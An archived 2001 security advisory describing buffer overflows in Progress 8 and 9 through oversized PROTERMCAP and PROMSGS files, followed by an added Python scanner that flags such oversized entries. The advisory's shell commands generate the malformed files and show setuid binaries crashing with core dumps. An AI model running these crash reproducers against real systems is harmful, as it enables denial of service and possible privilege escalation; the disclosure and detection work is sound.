OSEC

From: KF (dotslash@snosoft.com)
Date: Mon Oct 08 2001 - 15:14:59 CDT

    A malformed termcap and promsgs can overwrite memory on Progress
    versions 8 and 9. These are two separate issues, but the below examples
    show they can be used simultaneously in some cases. These have been
    patched to my knowledge; however, I do not know the patch numbers. Put a
    few thousand chars on each line and you should be able to crash most of
    the suid executables and plenty of others. Please note these issues are
    not related to the other 2 posts released this week. They were filed
    with Progress under different issue tickets and were addressed in fixes
    separately.

    mal termcap entry:
    v7kf|version 7 key functions:\

    :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
    :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
    :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....

    [root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term
    [root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
    [root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
    [root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
    [root@linux dlc]# export PROTERMCAP=./term

    There are a few ways to set this off... you can make use of a bug in the
    PROMSGS. Here is the standard promsgs error for a bad term.
    PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
     
    Unable to use your terminal. Check your PROTERMCAP file. (443)
    ** Could not find terminal type xterm in file ./term. (146)

    [root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
    [root@linux dlc]# export PROMSGS=/tmp/promsgs

    [root@linux dlc]# bin/pro

                               Progress Software Corporation
                                        14 Oak Park
                                Bedford, Massachusetts 01730
                                        781-280-4000

           PROGRESS is a registered trademark of Progress Software Corporation
                                  Copyright 1984-2001
                            by Progress Software Corporation
                                  All Rights Reserved

    PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001

    Error formatting messaage 96. Message file is corrupt.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    errno=0 reading promsgs file, it may have been deleted.
    Unable to format message number 6063
    Error formatting messaage 24. Message file is corrupt.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    rrno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    errno=0 reading promsgs file, it may have been deleted.
    Error formatting messaage 146. Message file is corrupt.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    errno=0 reading promsgs file, it may have been deleted.
    Unable to format message number 443
    Error formatting messaage 49. Message file is corrupt.
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    errno=0 reading promsgs file, it may have been deleted.
    Unable to format message number 439
    Quit (core dumped)

    Here's the normal error when the termcap is wrong.
    Unable to use your terminal. Check your PROTERMCAP file. (443)
    ** The protermcap file must contain :ce. (117)
    ** The protermcap file must contain :cl. (117)
    ** The protermcap file must contain :cm. (117)

    Now for an example using just the termcap without tampering with PROMSGS...
    [root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
    [root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
    [root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
    [root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term
    [root@linux dlc]# export TERM=v7kf
    [root@linux dlc]# bin/pro

                               Progress Software Corporation
                                        14 Oak Park
                                Bedford, Massachusetts 01730
                                        781-280-4000
     
           PROGRESS is a registered trademark of Progress Software Corporation
                                  Copyright 1984-2001
                            by Progress Software Corporation
                                  All Rights Reserved
     
    PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
     
    SYSTEM ERROR: strent request for more than 32K. (893)
    Quit (core dumped)

    It is also possible to crash suids using only the PROMSGS... I have a
    patched version at the moment so I can not demonstrate.

    -KF
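The two inputs the post abuses are plain text files that an administrator can inspect before a setuid Progress binary ever parses them. The script below is an added example written for this page (it is not KF's code and not Progress's): it parses termcap-style entries, including the backslash continuation and the leading-colon lines the post's generated file uses, and reports any capability field or promsgs line larger than a configured limit. The `MAX_CAP_LEN` and `MAX_MSG_LINE_LEN` thresholds are assumptions for illustration; the only size the advisory itself documents is the 32K `strent` limit in the crash output, so tune them to what your installation's files normally contain.

```python
"""Scan a PROTERMCAP file and a PROMSGS file for oversized fields.

Added example for this advisory, not code from the original post or from
Progress. The length limits are assumptions chosen for illustration; the
advisory only shows that several-thousand-byte fields crash the client.
"""
import os

MAX_CAP_LEN = 1024       # assumed: a capability field longer than this is suspicious
MAX_MSG_LINE_LEN = 1024  # assumed: a promsgs line longer than this is suspicious


def _logical_lines(text):
    """Join termcap continuation lines (a trailing backslash continues the entry)."""
    out, buf = [], ""
    for line in text.splitlines():
        if line.endswith("\\"):
            buf += line[:-1]
            continue
        buf += line
        if buf.strip():
            out.append(buf)
        buf = ""
    if buf.strip():
        out.append(buf)
    return out


def parse_termcap_entries(text):
    """Return {entry names: [(cap, value), ...]} for termcap-style text.

    A logical line whose name field is empty (it starts with ':') is folded
    into the preceding entry, which is how the advisory's generated file is
    laid out. Escaped colons (\\072) are not decoded: this is a length
    check, not a full termcap parser.
    """
    entries, last = {}, None
    for entry in _logical_lines(text):
        if entry.lstrip().startswith("#"):
            continue
        fields = entry.split(":")
        name = fields[0].strip()
        if not name:
            if last is None:
                continue
            name = last
        caps = entries.setdefault(name, [])
        last = name
        for field in fields[1:]:
            field = field.strip()
            if not field:
                continue
            for sep in ("=", "#"):          # string caps use '=', numeric caps use '#'
                if sep in field:
                    cap, val = field.split(sep, 1)
                    break
            else:
                cap, val = field, ""        # boolean cap, or a bare oversized field
            caps.append((cap, val))
    return entries


def find_oversized_caps(text, limit=MAX_CAP_LEN):
    """List (entry name, 2-char cap name, field length) for fields over `limit`."""
    hits = []
    for name, caps in parse_termcap_entries(text).items():
        for cap, val in caps:
            length = len(cap) + len(val)
            if length > limit:
                hits.append((name, cap[:2], length))
    return hits


def find_oversized_msg_lines(text, limit=MAX_MSG_LINE_LEN):
    """List (1-based line number, length) for promsgs lines over `limit`."""
    return [(i, len(line)) for i, line in enumerate(text.splitlines(), 1)
            if len(line) > limit]


def check_files(termcap_path=None, promsgs_path=None):
    """Read the two files (if given and present) and return readable findings."""
    findings = []
    if termcap_path and os.path.isfile(termcap_path):
        with open(termcap_path, errors="replace") as fh:
            for name, cap, length in find_oversized_caps(fh.read()):
                findings.append(f"{termcap_path}: entry {name!r} cap {cap!r} is {length} bytes")
    if promsgs_path and os.path.isfile(promsgs_path):
        with open(promsgs_path, errors="replace") as fh:
            for lineno, length in find_oversized_msg_lines(fh.read()):
                findings.append(f"{promsgs_path}: line {lineno} is {length} bytes")
    return findings


# Constructed sample mirroring the advisory's entry: one 3000-byte :ce= value
# next to ordinary-sized :cl and :cm strings.
SAMPLE_TERMCAP = (
    "v7kf|version 7 key functions:\\\n"
    ":ce=" + "A" * 3000 + "\n"
    ":cl=\\E[H\\E[2J:cm=\\E[%i%d;%dH:\n"
)
SAMPLE_PROMSGS = "A" * 9000 + "\n"   # constructed: one 9000-byte line, as in the post

if __name__ == "__main__":
    # Check whatever files the current environment points Progress at, if any.
    for finding in check_files(os.environ.get("PROTERMCAP"), os.environ.get("PROMSGS")):
        print(finding)
    print(find_oversized_caps(SAMPLE_TERMCAP))
    print(find_oversized_msg_lines(SAMPLE_PROMSGS))
```

Run it with `PROTERMCAP` and `PROMSGS` exported as the post does and it reports the offending entry and line; since both variables are honoured by setuid binaries, the same check belongs in whatever wrapper or login profile sets them for users, so that only vetted files are ever handed to `bin/pro`.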